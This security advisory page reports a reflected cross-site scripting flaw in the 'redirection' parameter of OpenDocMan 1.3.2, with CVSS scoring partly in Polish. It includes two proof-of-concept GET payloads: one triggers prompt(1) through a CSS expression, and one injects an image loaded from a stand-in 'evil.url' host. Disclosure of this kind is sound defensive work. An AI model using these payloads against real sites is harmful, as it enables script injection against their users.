OpenDocMan 1.3.2 Cross Site Scripting

2015-09-04 / 2015-10-25
Credit: Matt Landers
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

Title: OpenDocMan 1.3.2 - Cross Site Scripting (Reflected) Disclosed: 9/2/15 Vendor Patched: Patched in version 1.3.3 Published: 9/2/15 Credit: Matt Landers - matt@mjltech.net Original Advisory: http://mjltech.net/adv/MJLTECH%20-%20OpenDocMan%201.3.2%20XSS.txt ====================================================================== Confirmed Vulnerable: OpenDocMan 1.3.2 Vendor: http://www.opendocman.com/ Description: "OpenDocMan is a free, web-based, open source document management system (DMS) written in PHP designed to comply with ISO 17025 and OIE standard for document management. It features web based access, fine grained control of access to files, and automated install and upgrades." ====================================================================== Vulnerable file: index.php Vulnerable parameter: redirection Description of vulnerability: The parameter 'redirection'is vulnerable to XSS via GET request from non-authenticated user. Proof of Concept: GET http://www.xxxx.com/odm/index.php?redirection=" style="width:expression(prompt(1)); Proof of Concept: GET http://www.xxxx.com/odm/index.php?redirection="></input><img src=http://www.evil.url/hacked.jpg>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top